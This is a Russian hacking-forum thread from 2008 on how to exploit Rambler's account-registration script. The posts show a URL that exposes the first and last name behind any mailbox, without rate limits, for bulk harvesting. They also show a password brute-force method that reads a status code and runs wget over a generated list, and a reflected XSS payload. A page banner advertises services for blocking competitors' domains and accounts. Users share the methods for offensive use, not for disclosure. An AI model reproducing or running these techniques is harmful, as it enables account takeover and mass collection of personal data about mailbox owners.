узнать ФамилиюИмя владельца мыла @rambler.ru

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
узнать ФамилиюИмя владельца мыла @rambler.ru

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

узнать ФамилиюИмя владельца мыла @rambler.ru

13.06.2008, 10:43

devton

Участник форума

Регистрация: 26.10.2007

Сообщений: 283

С нами: 9758812

Репутация: 212

узнать ФамилиюИмя владельца мыла @rambler.ru

http://id.rambler.ru/script/reg.cgi?password=666&username=luba@rambler.ru

достаточно просто открыть урл в бровзере - и увидите ЛюбаГиоргис - Firsname и Lastname - имя и фамилию, указанные владельцем мыла при регистрации ящика

самое интересное - похоже, нет ограничений на интенсивность обращения к урлу - получилось сделать около 50.000 запросов со скоростью около 20 запросов\сек. Т.е. легко собрать именную базу мыл на Рамблере

𝕏 Twitter Reddit Telegram Копировать ссылку

13.06.2008, 10:52

devton

Участник форума

Регистрация: 26.10.2007

Сообщений: 283

С нами: 9758812

Репутация: 212

П.С. с помощью этого урла можно еще и брутать пароль к ящику @rambler.ru
Если в теле запрошенной страницы (например, http://id.rambler.ru/script/reg.cgi?password=666666&username=luba@rambler.ru) есть код:
<status>1</status>
значит пароль "666666" подошел!

Учитывая отсутствие ограничений на кол-во\скорость подбора пароля получается неплохой "интерфейс" для брута

14.06.2008, 20:37

diman19911

Познающий

Регистрация: 25.05.2008

Сообщений: 59

С нами: 9453869

Репутация: 26

а если <status>2</status>
то что тогда пароль не подходит?

16.06.2008, 23:31

Sleep

Участник форума

Регистрация: 31.10.2007

Сообщений: 193

С нами: 9752260

Репутация: 150

Цитата:

Сообщение от devton

Ограничение на подбор пароля есть

после ~20 неправильных вводов пароля будет всегда выдавать

Код:

<status>2</status>

а при попытке зайти с главной страницы будет просить ввода капчи

14.06.2008, 20:42

~~mad_xakep~~

Banned

Регистрация: 10.04.2007

Сообщений: 244

С нами: 10045826

Репутация: 264

хм правду работает! первый раз про это слышу! спс

14.06.2008, 20:42

devton

Участник форума

Регистрация: 26.10.2007

Сообщений: 283

С нами: 9758812

Репутация: 212

мда блин

используя етот status можно брутить пароли к рамбл-ящику чз веб-интерфейс

14.06.2008, 21:08

SeTM

Новичок

Регистрация: 11.06.2008

Сообщений: 29

С нами: 9429617

Репутация: 11

Цитата:

Сообщение от devton

мда блин

используя етот status можно брутить пароли к рамбл-ящику чз веб-интерфейс

причем очень легко...

14.06.2008, 21:18

X-Venom

Постоянный

Регистрация: 29.04.2008

Сообщений: 913

С нами: 9491154

Репутация: 1031

Можна это все реализовать в брут пока бага еще свежая=)

14.06.2008, 21:43

devton

Участник форума

Регистрация: 26.10.2007

Сообщений: 283

С нами: 9758812

Репутация: 212

реализовать в брут

писать нич0 не надо - достаточно сгенерить или собрать файлик с паролями, перед каждым паролем вставить "http://id.rambler.ru/script/reg.cgi?username=luba@rambler.ru&password=", сохранить файлик как "brute.txt", запустить:

wget -i brute.txt

и брут начнецца

#10

14.06.2008, 21:51

Sleep

Участник форума

Регистрация: 31.10.2007

Сообщений: 193

С нами: 9752260

Репутация: 150

Пасивная XSS
http://id.rambler.ru/script/reg.cgi?username=<script>alert('XSS')</script>

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Методы "вспоминания" пароля (от мыла)	censored!	Уязвимости Mail-сервис	212	05.10.2020 00:02
Как узнать пароль от мыла на list.ru?	bike	Уязвимости Mail-сервис	16	21.02.2006 15:11
Как узнать ПАСС ОТ МЫЛА	=Be$=	Уязвимости Mail-сервис	5	24.01.2006 15:12